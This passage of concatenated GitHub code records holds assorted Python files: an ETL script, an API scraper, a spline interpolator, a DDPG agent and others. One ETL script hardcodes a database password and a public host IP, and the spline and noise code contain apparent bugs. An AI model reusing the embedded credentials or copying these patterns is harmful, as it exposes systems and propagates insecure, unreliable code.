'selectors', 'socketserver', 'statistics', 'tkinter', 'tracemalloc', 'turtledemo', 'typing',\n 'venv', 'winreg', 'xmlrpc', 'zipapp'\n]\nSTD_LIB_36 = ['secrets']\nSTD_LIB_37 = ['contextvars', 'dataclasses']\nSTD_LIB_38 = [] # type: ignore\nSTD_LIB_39 = ['graphlib', 'zoneinfo']\nSTD_LIB_310 = [] # type: ignore\n\nSTD_LIB = STD_LIB_27 + STD_LIB_35 + STD_LIB_36 + STD_LIB_37 + STD_LIB_38 + STD_LIB_39 + STD_LIB_310\n\n\ndef separate_third_party_from_std_lib(packages: Iterable[str]) -> Tuple[List[str], List[str]]:\n \"\"\"Separate third-party packages from standard library modules.\n\n Args:\n packages: Package names\n\n Returns:\n Third-party packages, standard library modules\n \"\"\"\n third_party, std_lib = [], []\n for package in packages:\n if package in STD_LIB:\n std_lib.append(package)\n else:\n third_party.append(package)\n return third_party, std_lib\n\n\ndef get_std_lib(version: str) -> List[str]:\n \"\"\"Scrape modules in the standard library for a given Python version.\n\n Args:\n version: Python version\n\n Returns:\n Standard library modules for a given Python version\n \"\"\"\n import requests # type: ignore\n from bs4 import BeautifulSoup # type: ignore\n\n url = f'https://docs.python.org/{version}/py-modindex.html'\n resp = requests.get(url)\n resp.raise_for_status()\n\n soup = BeautifulSoup(resp.text, 'html.parser')\n links = soup.find('table').find_all('a', href=True)\n std_lib = [link.text.split('.')[0] for link in links]\n\n return sorted(set(std_lib))\n\n\nif __name__ == '__main__':\n versions = ['2.7', '3.5', '3.6', '3.7', '3.8', '3.9', '3.10']\n cumulative = []\n for version in versions:\n std_lib = get_std_lib(version)\n print(f'\\nNew additions in {version}')\n print([module for module in std_lib if module not in cumulative])\n cumulative.extend(std_lib)\n","repo_name":"zzhengnan/iscan","sub_path":"iscan/std_lib.py","file_name":"std_lib.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25647426990","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\n#import libraries\n\nimport psycopg2\nfrom psycopg2 import extras \nimport pandas as pd\nimport os\nimport numpy as np\nfrom datetime import datetime\n\n\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\nimport db_dtypes\n\n\n#Connection to cloud BigQuery\ncredentials = service_account.Credentials.from_service_account_file('/home/airflow/gcs/data/GoogleBigQuerykey.json')\nclient = bigquery.Client(credentials=credentials)\n\n#connection to source Postgres DB\nconn = psycopg2.connect(database=\"ufh\",\n user='postgres', password='postgre', \n host='35.196.236.36', port='5432'\n)\n\nconn.autocommit = True\ncursor = conn.cursor()\n\n#default date for initial load\nformat_data = \"%d/%m/%Y %H:%M:%S.%f\"\ntime_data = \"01/01/1900 00:00:0.000\"\ndefault_date = datetime.strptime(time_data,format_data)\n\n# Function to insert log details in Bigquery\n\ndef insertetllog(tablename, etlrowcount, status):\n try:\n #Declare etlid value for log insert\n query_string =\"\"\"SELECT max(etlid) as max_etlid FROM `access-3-352609.UFH_DM.etl_logs` \"\"\"\n max_etlid = client.query(query=query_string).result().to_dataframe()['max_etlid'][0]\n etlid = max_etlid +1\n \n\n # set record attributes\n record = {\"etlid\":etlid,\"tablename\":tablename,\"etlrowcount\": etlrowcount,\n \"etldatetime\":datetime.now(),\"status\":status}\n \n table_ref = client.dataset(\"UFH_DM\").table(\"etl_logs\")\n df_record = 
pd.DataFrame(record,index=[0])\n client.load_table_from_dataframe(df_record,table_ref)\n\n except Exception as e:\n print(\"Unable to insert record into etl logs: \" + str(e))\n\n# function to get last ETL run for dim_address table\n#default date for initial load\ndef getLastETLforDimAddress(tblname):\n try:\n query = f\"\"\"select max(etldatetime) as max_etldatetime from `access-3-352609.UFH_DM.etl_logs` where tablename = '{tblname}'\"\"\"\n etlrundate = client.query(query).result().to_dataframe()['max_etldatetime'][0]\n return etlrundate\n except Exception as e:\n return default_date\n\n# Function to get delta record to insert for dim_address\n# Function to get record from customer_master from Postgres DB \ndef ExtractDimAddressData():\n lastrundate = getLastETLforDimAddress('dim_address')\n #qry = f'''select * from customer_master where update_timestamp > '{lastrundate}';'''\n datetime_lastrun = datetime.now()\n qry = f'''select * from customer_master where update_timestamp < '{datetime_lastrun}';'''\n df = pd.read_sql_query(qry,conn)\n return df\n\n# ETL operation to generate dim_address data\ndef TransformDimAddressData(dim_aaddress_data):\n dim_address_fields = ['address_id','address','city','state','pincode']\n #dim_aaddress_data = ExtractDimAddressData()\n\n delta_address = pd.DataFrame(columns=dim_address_fields, index = range(1, len(dim_aaddress_data)+1))\n\n #fetch historical dim_address data from Bigquery\n query_string =\"\"\"SELECT * FROM `access-3-352609.UFH_DM.dim_address` ORDER BY address_id DESC\"\"\"\n dim_address_hist = client.query(query_string).result().to_dataframe()\n\n for i in range(1, len(dim_aaddress_data)+1):\n delta_address['address_id'][i] = i\n delta_address['address'][i]= dim_aaddress_data['address'][i-1]\n delta_address['city'][i] = dim_aaddress_data['city'][i-1]\n delta_address['state'][i] = dim_aaddress_data['state'][i-1]\n delta_address['pincode'][i] = dim_aaddress_data['pincode'][i-1]\n\n #compare against history and keep only new rows\n inserts = delta_address[~delta_address.apply(tuple,1).isin(dim_address_hist.apply(tuple,1))]\n return inserts\n\ndef LoadDimAddressData(inserts,tablename):\n try:\n print('Loading data into BigQuery')\n #tableRef = client.dataset(\"UFH_DM\").table('dim_address')\n tableRef = client.dataset(\"UFH_DM\").table(tablename)\n bigqueryJob = client.load_table_from_dataframe(inserts, tableRef)\n print('Load Complete')\n except Exception as e:\n print('Something went wrong while loading: ' + str(e))\n \n# Calling main function \nif __name__ == '__main__':\n required_record = ExtractDimAddressData()\n insert_record = TransformDimAddressData(required_record)\n Loaded_record = LoadDimAddressData(insert_record,'dim_address')\n print('Done')\n","repo_name":"2912rohit1993/Capstone-3-Project","sub_path":"dim_address_script.py","file_name":"dim_address_script.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7725111002","text":"import argparse\nimport csv\nimport os\nimport requests\nimport sqlite3\nimport sys\n\ncsv.field_size_limit(sys.maxsize)\n\n# the attributes to be collected from API call GET /v2/channels\n# https://dev.are.na/documentation/channels#Block43473\nCHANNEL_TARGET_ATTRS = ['id', 'title', 'created_at', 'updated_at', 'published',\n 
'open', 'collaboration', 'slug', 'length', 'kind', 'status', 'user_id', \\\n 'follower_count', 'contents', 'collaborators']\n\n# the user attributes to be collected from API call GET /v2/search (returns users)\n# https://dev.are.na/documentation/search#Block59799\nUSER_TARGET_ATTRS = ['id', 'slug', 'username', 'first_name', 'last_name', \\\n 'channel_count', 'following_count', 'profile_id', 'follower_count']\n\nBLOCK_CONN_TARGET_ATTRS = ['block_connections']\n\nCHANNEL_CONN_TARGET_ATTRS = ['channel_connections']\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='are.na data collection')\n parser.add_argument('-channel_csv', help='path to channel csv file to be written to', default='csv/channels.csv')\n parser.add_argument('-user_csv', help='path to user csv file to be written to', default='csv/users.csv')\n parser.add_argument('-block_conn_csv', help='path to block connections csv file to be written to', default='csv/block_connections.csv')\n parser.add_argument('-channel_conn_csv', help='path to channel connections csv file to be written to', default='csv/channel_connections.csv')\n\n parser.add_argument('-channel_table', help='channel table name in database', default='channels')\n parser.add_argument('-user_table', help='user table name in database', default='users')\n parser.add_argument('-connections_table', help='connections table name in database', default='connections')\n\n parser.add_argument('-db', help='path to db file to be written to', default='data.db')\n parser.add_argument('-batch_size', help='batch_size for requests (as large as possible for speed)', default=10000)\n\n return parser.parse_args()\n\n\ndef channel_request_iterator(batch_size):\n \"\"\"\n yields a list of channel json data of length batch_size\n \"\"\"\n\n print('Establishing connection to channels API')\n\n page = 1\n url = 'http://api.are.na/v2/channels'\n\n payload = {'page':page, 'per':batch_size}\n req = requests.get(url, params=payload)\n\n if req.status_code != 200 or len(req.json()['channels']) == 0:\n print('Error establishing API connection. 
Skipping channel write.')\n\n num_pages = req.json()['total_pages']\n\n while True:\n print('Requesting channels (page %i of %i)' % (page, num_pages))\n\n payload = {'page':page, 'per':batch_size}\n page += 1\n\n req = requests.get(url, params=payload)\n channel_data = req.json()['channels']\n\n if req.status_code != 200 or len(channel_data) == 0:\n break\n\n print('Writing channel data to csv')\n\n for channel in channel_data:\n yield channel\n\n\ndef user_request_iterator(batch_size):\n \"\"\"\n yields a list of user json data of length batch_size\n \"\"\"\n\n print('Establishing connection to search API (to collect users)')\n\n for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':\n page = 1\n print('Fetching users with query \"%s\"' % letter)\n while True:\n url = 'http://api.are.na/v2/search/users/'\n payload = {'q':letter, 'page':page, 'per':batch_size}\n\n\n req = requests.get(url, params=payload)\n\n user_json = req.json()\n user_data = user_json['users']\n num_pages = user_json['total_pages']\n\n if req.status_code != 200 or len(user_data) == 0:\n break\n\n print('Writing user data to csv (page %i of %i)' % (page, num_pages))\n page += 1\n\n for user in user_data:\n yield user\n\n\ndef block_connections_iterator(channels_csv_fp, batch_size):\n\n print(\"Requesting block connections from API\")\n\n with open(channels_csv_fp, mode='r') as f:\n reader = csv.reader(f)\n next(reader)\n\n channel_ids = [int(tuple(line)[0]) for line in reader]\n\n for id in channel_ids[1:]:\n page = 1\n out = [id]\n\n print('Requesting block connections for channel id %i' % id)\n\n while True:\n url = 'http://api.are.na/v2/channels/%s/channels' % id\n payload = {'page':page, 'per':batch_size}\n page += 1\n\n req = requests.get(url, params=payload)\n block_connections = req.json()['channels']\n\n if req.status_code != 200 or len(block_connections) == 0:\n break\n\n out.extend([item['channel']['id'] for item in block_connections])\n\n if len(out) > 1:\n print('Writing block connections to csv')\n yield {'id':id, 'block_connections':out}\n\ndef channel_connections_iterator(channels_csv_fp, batch_size):\n with open(channels_csv_fp, mode='r') as f:\n reader = csv.reader(f)\n next(reader)\n\n channel_ids = [int(tuple(line)[0]) for line in reader]\n\n for id in channel_ids[1:]:\n page = 1\n out = [id]\n\n print('Requesting channel connections for channel id %i' % id)\n\n while True:\n url = 'http://api.are.na/v2/channels/%s/connections' % id\n payload = {'page':page, 'per':batch_size}\n page += 1\n\n req = requests.get(url, params=payload)\n channel_connections = req.json()['channels']\n\n if req.status_code != 200 or len(channel_connections) == 0:\n break\n\n out.extend([item['id'] for item in channel_connections])\n\n if len(out) > 1:\n print('Writing channel connections to csv')\n yield {'id':id, 'channel_connections':out}\n\ndef write_csv_data(csv_path, data_iterator, target_attrs):\n \"\"\"\n Opens file from csv_path, and receives data from data_iterator,\n extracting attributes in target_attrs from json and writing to .csv\n \"\"\"\n\n if not os.path.isdir(csv_path.split('/')[0]):\n os.makedirs('./csv')\n\n if os.path.exists(csv_path):\n os.remove(csv_path)\n\n f = open(csv_path, 'w+')\n w = csv.writer(f, delimiter=',')\n\n w.writerow(target_attrs)\n\n num_written = 0\n ids = set()\n\n print('Staged to write data to %s' % csv_path)\n\n for d in data_iterator:\n d['id'] = int(d['id']) #TODO: alter data so all ids are already int\n\n if d['id'] in ids:\n continue # if already seen id\n\n 
ids.add(d['id'])\n\n save_data = [value for (key, value) in d.items() if key in target_attrs]\n\n if len(save_data) == 1: # if from connections TODO: clean up logic\n save_data = save_data[0]\n\n w.writerow(save_data)\n num_written += 1\n\n print('Wrote %i rows to %s' % (num_written, csv_path))\n\n f.close()\n print('Done\\n')\n\ndef write_channel_csv_to_db(csv_fp, db_fp, table_name):\n conn = sqlite3.connect(db_fp)\n c = conn.cursor()\n c.execute('DROP TABLE IF EXISTS %s;' % table_name)\n\n create_table_command = 'CREATE TABLE %s (' % table_name + \\\n 'id int NOT NULL,' + \\\n 'title varchar,' + \\\n 'created_at datetime,' + \\\n 'updated_at datetime,' + \\\n 'published boolean,' + \\\n 'open boolean,' + \\\n 'collaboration boolean,' + \\\n 'slug varchar,' + \\\n 'length int,' + \\\n 'kind varchar,' + \\\n 'status varchar,' + \\\n 'user_id varchar,' + \\\n 'follower_count int,' + \\\n 'contents varchar,' + \\\n 'collaborators varchar' + \\\n ');'\n\n c.execute(create_table_command)\n\n with open(csv_fp) as channels_csv:\n reader = csv.reader(channels_csv)\n channel_data = [tuple(line) for line in reader]\n\n print('Writing %i rows from %s to %s' % (len(channel_data), csv_fp, db_fp+'/'+table_name))\n for channel in channel_data:\n while len(channel) < len(CHANNEL_TARGET_ATTRS): channel += (None,)\n insert_command = 'INSERT INTO %s VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)' % table_name\n c.execute(insert_command, channel)\n\n conn.commit()\n print('Done\\n')\n\ndef write_user_csv_to_db(csv_fp, db_fp, table_name):\n conn = sqlite3.connect(db_fp)\n c = conn.cursor()\n\n c.execute('DROP TABLE IF EXISTS %s;' % table_name)\n\n create_table_command = 'CREATE TABLE %s (' % table_name + \\\n 'id int NOT NULL,' + \\\n 'slug varchar,' + \\\n 'username varchar,' + \\\n 'first_name varchar,' + \\\n 'last_name varchar,' + \\\n 'channel_count int,' + \\\n 'following_count int,' + \\\n 'profile_id int,' + \\\n 'follower_count int' + \\\n ');'\n\n c.execute(create_table_command)\n\n with open(csv_fp, 'r') as f:\n reader = csv.reader(f)\n user_data = [tuple(line) for line in reader]\n\n print('Writing %i rows from %s to %s' % (len(user_data), csv_fp, db_fp+'/'+table_name))\n\n for user in user_data:\n insert_command = 'INSERT INTO %s VALUES (?,?,?,?,?,?,?,?,?)' % table_name\n c.execute(insert_command, user)\n\n conn.commit()\n print('Done\\n')\n\ndef main():\n args = parse_args()\n\n channel_csv_fp = args.channel_csv\n user_csv_fp = args.user_csv\n block_conn_csv_fp = args.block_conn_csv\n channel_conn_csv_fp = args.channel_conn_csv\n\n db_fp = args.db\n channel_table_name = args.channel_table\n user_table_name = args.user_table\n batch_size = args.batch_size\n\n channel_iterator = channel_request_iterator(batch_size)\n write_csv_data(channel_csv_fp, channel_iterator, CHANNEL_TARGET_ATTRS)\n write_channel_csv_to_db(channel_csv_fp, db_fp, channel_table_name)\n\n user_iterator = user_request_iterator(batch_size)\n write_csv_data(user_csv_fp, user_iterator, USER_TARGET_ATTRS)\n write_user_csv_to_db(user_csv_fp, db_fp, user_table_name)\n\n block_conn_iterator = block_connections_iterator(channel_csv_fp, batch_size)\n write_csv_data(block_conn_csv_fp, block_conn_iterator, BLOCK_CONN_TARGET_ATTRS)\n\n channel_conn_iterator = channel_connections_iterator(channel_csv_fp, batch_size)\n write_csv_data(channel_conn_csv_fp, channel_conn_iterator, CHANNEL_CONN_TARGET_ATTRS)\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"cs1951a-s20-brown/cs1951a-s20-brown.github.io","sub_path":"projects/project_data/scra.per/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":11054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36371598985","text":"import os, sys\nfrom xdg import xdg_data_home, xdg_config_home\n\n## Genral Information\ninfo = {\n\t\"NAME\": \"ColorApp\",\n\t\"VERSION\": \"0.2.0\",\n\t\"AUTHOR\": \"Fr75s\",\n\t\"URL\": \"\"\n}\n\npaths = {\n\t\"DATA\": os.path.join(xdg_data_home(), \"colorapp/\"),\n\t\"CONF\": os.path.join(xdg_config_home(), \"colorapp/\")\n}\n\nversion_info = info[\"NAME\"] + \" v\" + info[\"VERSION\"] + \". Made by \" + info[\"AUTHOR\"]\n\ncolors = {\n\t\"main\": \"#26282d\",\n\t\"side\": \"#1e2126\",\n\t\"tool\": \"#16171a\",\n\t\"text\": \"#f2f6ff\"\n}\n\noptions = {\n\t\"simpledisp\": False,\n\t\"altcolschemegen\": False\n}\n","repo_name":"Fr75s/colorapp","sub_path":"colorapp/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37183029413","text":"\"\"\"Command-line interface - run command.\n\nAttributes:\n cmd_help (str): The help string to use for this command.\n cmd_short_help (str): The short help to use for this command. This is shown on the\n command listing of the parent command.\n\n\"\"\"\nfrom typing import Dict, Any\nfrom subprocess import CalledProcessError\n\nimport click\nfrom fastapi_mvc.cli import ClickAliasedCommand\nfrom fastapi_mvc.utils import run_shell, get_poetry_path, require_fastapi_mvc_project\n\n\ncmd_short_help = \"Run development uvicorn server.\"\ncmd_help = \"\"\"\\\nThe 'fastapi-mvc run' commands runs development uvicorn server for a\nfastapi-mvc project at the current working directory.\n\"\"\"\n\n\n@click.command(\n cls=ClickAliasedCommand,\n help=cmd_help,\n short_help=cmd_short_help,\n alias=\"r\",\n)\n@click.option(\n \"--host\",\n help=\"Host to bind.\",\n type=click.STRING,\n default=\"127.0.0.1\",\n required=False,\n show_default=True,\n)\n@click.option(\n \"-p\",\n \"--port\",\n help=\"Port to bind.\",\n type=click.STRING,\n default=\"8000\",\n required=False,\n show_default=True,\n)\n@click.option(\n \"-i\",\n \"--install\",\n help=\"Run poetry install.\",\n is_flag=True,\n)\n@click.pass_context\ndef run(ctx: click.Context, **options: Dict[str, Any]) -> None:\n \"\"\"Define command-line interface run command.\n\n Args:\n ctx (click.Context): Click Context class object instance.\n options (typing.Dict[str, typing.Any]): Map of command option names to their\n parsed values.\n\n \"\"\"\n project_data = require_fastapi_mvc_project()\n poetry_path = get_poetry_path()\n\n if options[\"install\"]:\n run_shell(\n cmd=[\n poetry_path,\n \"install\",\n \"--no-interaction\",\n ],\n check=True,\n )\n\n try:\n run_shell(\n cmd=[\n poetry_path,\n \"run\",\n \"uvicorn\",\n \"--factory\",\n \"--host\",\n f\"{options['host']}\",\n \"--port\",\n f\"{options['port']}\",\n \"--reload\",\n f\"{project_data['package_name']}.app:get_application\",\n ],\n check=True,\n )\n except CalledProcessError:\n click.secho(\"Run 'make install` to install the project.\", fg=\"yellow\")\n ctx.exit(1)\n","repo_name":"fastapi-mvc/fastapi-mvc","sub_path":"fastapi_mvc/cli/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} 
+{"seq_id":"15053488763","text":"from load_profile import load_foil\n\n#list of data point (e for extardos and i for intrados)\n(dim,ex,ey,ix,iy) = load_foil(\"c5a.dat\")\n\n\ndef spline(x,y):\n n = len(x)\n y2 = [0]\n u = [0]\n for i in range(1,n-1):\n sig = (x[i]-x[i-1])/(x[i+1]-x[i-1])\n p = sig * y2[i-1] + 2.\n y2.append((sig - 1.) / p)\n u.append((6. * ((y[i+1]-y[i])/(x[i+1]-x[i]) - (y[i]-y[i-1])/(x[i]-x[i-1])) / (x[i+1]-x[i-1]) - sig*u[i-1])/p)\n y2.append(1)\n for i in range(n-2,0,-1):\n y2[i]=y2[i] * y2[i+1] + u[i]\n return y2\n\ndef splint(X,Y,x,y2):\n n = len(X)\n kmin = 0\n kmax = n - 1\n while(kmax - kmin > 1):\n k= (kmax+kmin)//2\n if(X[k] > x):\n kmax = k\n else :\n kmin = k\n h = (X[kmin] - X[kmax])\n if (h == 0):\n print(\"erreur in X list\")\n a = (X[kmax] - x) /h\n b = (x - X[kmin]) /h\n y = a*Y[kmin] + b*Y[kmax] + ((a**3 - a) * y2[kmax] + (b**3 - b) * y2[kmax])*(h**2)/6.\n return y\n\n\ny2intra = spline(ix,iy)\ny2extra = spline(ex,ey)\n\ndef intrados(x):\n return splint(ix,iy,x,y2intra)\n\ndef extrados(x):\n return splint(ex,ey,x,y2extra)\n\n","repo_name":"maelle101/Algonum5","sub_path":"interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32027117115","text":"from Models import Actor, Critic\n\nimport numpy as np\nimport random\nimport copy\nfrom collections import namedtuple, deque\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nBUFFER_SIZE = int(1e6)\nBATCH_SIZE= 64\nGAMMA = 0.99 \nTAU = 1e-3 \nLR_ACTOR = 0.001 \nLR_CRITIC = 0.003 \nWEIGHT_DECAY = 0.0001 \n\nclass Agent():\n\n def __init__(self, s_size, a_size, seed, device):\n\n self.s_size = s_size\n self.a_size = a_size\n self.seed = seed\n self.device = device\n\n self.actor_local = Actor(s_size, a_size, seed).to(self.device)\n self.actor_target = Actor(s_size, a_size, seed).to(self.device)\n self.actor_optim = optim.Adam(self.actor_local.parameters(), lr=LR_ACTOR)\n\n self.critic_local = Critic(s_size, a_size, seed).to(self.device)\n self.critic_target = Critic(s_size, a_size, seed).to(self.device)\n self.critic_optim = optim.Adam(self.critic_local.parameters(), lr=LR_CRITIC)\n\n self.noise = OUNoise(a_size, seed)\n self.memory = ReplayBuffer(a_size, BUFFER_SIZE, BATCH_SIZE, seed)\n\n def step(self, state, action, reward, next_state, done):\n self.memory.add(state, action, reward, next_state, done)\n\n if len(self.memory) > BATCH_SIZE:\n experiences = self.memory.sample()\n self.learn(experiences, GAMMA)\n\n def act(self, state, add_noise=False):\n state = torch.from_numpy(state).float().to(self.device)\n self.actor_local.eval()\n with torch.no_grad():\n action = self.actor_local(state).cpu().data.numpy()\n self.actor_local.train()\n if add_noise:\n action += self.noise.sample()\n return np.clip(action, -1, 1)\n\n def reset(self):\n self.noise.reset()\n\n def learn(self, experiences, gamma):\n states = []\n actions = []\n rewards = []\n next_states = []\n dones = []\n\n for e in experiences:\n\n if len(states) == 0:\n states = np.append(states, e.state)\n actions = np.append(actions, e.action)\n rewards = np.append(rewards, e.reward)\n next_states = np.append(next_states, e.next_state)\n dones = np.append(dones, e.done)\n else:\n states = np.vstack((states, e.state))\n actions = np.vstack((actions, e.action))\n rewards = np.vstack((rewards, e.reward))\n next_states = np.vstack((next_states, e.next_state))\n dones = np.vstack((dones, 
e.done))\n\n # print(states)\n states = torch.from_numpy(states).float().to(self.device)\n actions = torch.from_numpy(actions).float().to(self.device)\n rewards = torch.from_numpy(rewards).float().to(self.device)\n next_states = torch.from_numpy(next_states).float().to(self.device)\t\t\t\n dones = torch.from_numpy(dones).float().to(self.device)\n \n # ---------------------------- update critic ---------------------------- #\n # Get predicted next-state actions and Q values from target models\n actions_next = self.actor_target(next_states)\n Q_targets_next = self.critic_target(next_states, actions_next)\n # Compute Q targets for current states (y_i)\n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n # Compute critic loss\n Q_expected = self.critic_local(states, actions)\n critic_loss = F.mse_loss(Q_expected, Q_targets)\n # Minimize the loss\n self.critic_optim.zero_grad()\n critic_loss.backward()\n self.critic_optim.step()\n\n # ---------------------------- update actor ---------------------------- #\n # Compute actor loss\n actions_pred = self.actor_local(states)\n actor_loss = -self.critic_local(states, actions_pred).mean()\n # Minimize the loss\n self.actor_optim.zero_grad()\n actor_loss.backward()\n self.actor_optim.step()\n\n # ----------------------- update target networks ----------------------- #\n self.soft_update(self.critic_local, self.critic_target, TAU)\n self.soft_update(self.actor_local, self.actor_target, TAU) \n\n def soft_update(self, local_model, target_model, tau):\n for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n\n\nclass OUNoise:\n \"\"\"Ornstein-Uhlenbeck process.\"\"\"\n\n def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):\n self.mu = mu * np.ones(size)\n self.theta = theta\n self.sigma = sigma\n self.seed = random.seed(seed)\n self.reset()\n\n def reset(self):\n self.state = copy.copy(self.mu)\n\n def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state\n\n\nclass ReplayBuffer:\n\n def __init__(self, action_size, buffer_size, batch_size, seed):\n\n self.memory = deque(maxlen=buffer_size) # internal memory (deque)\n self.batch_size = batch_size\n self.seed = random.seed(seed)\n\n def add(self, state, action, reward, next_state, done):\n e = Experience(state, action, reward, next_state, done)\n self.memory.append(e)\n\n def sample(self):\n return random.sample(self.memory, k=self.batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass Experience:\n\n def __init__(self, state, action, reward, next_state, done):\n\n self.state = state\n self.action = action\n self.reward = reward\n self.next_state = next_state\n self.done = done","repo_name":"danielhazann/RL_project","sub_path":"LunarLanderContinuous/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":5807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74580553449","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 5 23:50:23 2019\n\n@author: redne\n\"\"\"\n\nmass=input(\"input\")\nmass=mass.split(\"\\n\")\nmass=[int(n) for n in mass]\n\ndef fuelCount(aMass):\n retval=int(aMass/3)-2\n if(retval<0):\n retval=0\n else:\n retval+=fuelCount(retval)\n \n return retval\n\nfuel=0\nfor i in mass:\n fuel+=fuelCount(i)\n \nprint(\"Fuel 
is\",fuel)","repo_name":"eqkessel/PythonSandbox","sub_path":"BrotherCodingCoOp/adventofcode2019_01_1.py","file_name":"adventofcode2019_01_1.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34715957782","text":"from src.dataset import get_test_dataset\nfrom src.config import Config as Cfg\nfrom src.model import load_model\n\n\n# Define model path\n# model_path = f'./models/cifar-10/{Cfg.MODEL_TYPE}'\nmodel_path = f'{Cfg.MODEL_PATH}/best'\n\n# Load model\nmodel, input_shape = load_model(model_path=model_path)\nprint(f'Model loads from {model_path}')\n\n# Get test dataset\ntest_dataset = get_test_dataset(input_shape=input_shape)\n\n# Evaluate model on test data\neval_results = model.evaluate(test_dataset)\n\nif Cfg.MODEL_TYPE == 'GoogLeNet':\n print(f'{Cfg.MODEL_TYPE} loss: {round(eval_results[1], ndigits=4)}'\n f'\\n{Cfg.MODEL_TYPE} accuracy: {round(100 * eval_results[4], ndigits=2)}')\nelse:\n print(f'{Cfg.MODEL_TYPE} loss: {round(eval_results[0], ndigits=4)}'\n f'\\n{Cfg.MODEL_TYPE} accuracy: {round(100 * eval_results[1], ndigits=2)}')\n\n","repo_name":"MrRiahi/Convolutional-Neural-Networks-Tensorflow","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"11860980727","text":"class Solution:\n def canPartition(self, nums: list[int]) -> bool:\n total = sum(nums)\n if(total % 2 == 1):\n return False\n half = total//2\n nums.sort\n # try to find items from nums that can add to half\n dp = [0]*(half+1)\n for i in range(len(nums)):\n for j in range(half, nums[i]-1, -1):\n dp[j] = max(dp[j], dp[j-nums[i]]+nums[i])\n print(dp)\n if dp[half] == half:\n return True\n return False\n\n\ns = Solution()\nnums = [1, 5, 5, 11]\nprint(s.canPartition(nums))\n","repo_name":"liu-yuxin98/LeetCodeHot100","sub_path":"Dynamic_Programming/416PartitionEqualSubsetSum.py","file_name":"416PartitionEqualSubsetSum.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38132494399","text":"class Solution:\n def backspaceCompare(self, s: str, t: str) -> bool:\n return self.type_str(s) == self.type_str(t)\n\n @staticmethod\n def type_str(ms):\n rst = []\n for i in ms:\n if i != '#':\n rst.append(i)\n elif rst:\n rst.pop()\n return rst\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n s = \"ab#c\"\n t = \"ad#c\"\n s = \"ab##\"\n t = \"c#d#\"\n s = \"a##c\"\n t = \"#a#c\"\n s = \"a#c\"\n t = \"b\"\n print(sol.backspaceCompare(s, t))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc500+/lc844/BackspaceStringCompare.py","file_name":"BackspaceStringCompare.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71968484648","text":"puzzle_input = [s.strip() for s in open('input.in').readlines()]\n\nposition = {\n 'a': {0, 2, 3, 5, 6, 7, 8, 9},\n 'b': {0, 4, 5, 6, 8, 9},\n 'c': {0, 1, 2, 3, 4, 7, 8, 9},\n 'd': {2, 3, 4, 5, 6, 8, 9},\n 'e': {0, 2, 6, 8},\n 'f': {0, 1, 3, 4, 5, 6, 7, 8, 9},\n 'g': {0, 2, 3, 5, 6, 8, 9}\n}\n\nsignal_length = {\n 2: {1},\n 3: {7},\n 4: {4},\n 5: {2, 3, 5},\n 6: {0, 6, 9},\n 7: {8}\n}\n\ntotal = 0\n\nfor line in puzzle_input:\n line = line.split(\" | \")\n\n possible = {}\n\n # generate possibilities\n for signal in line[0].split(\" 
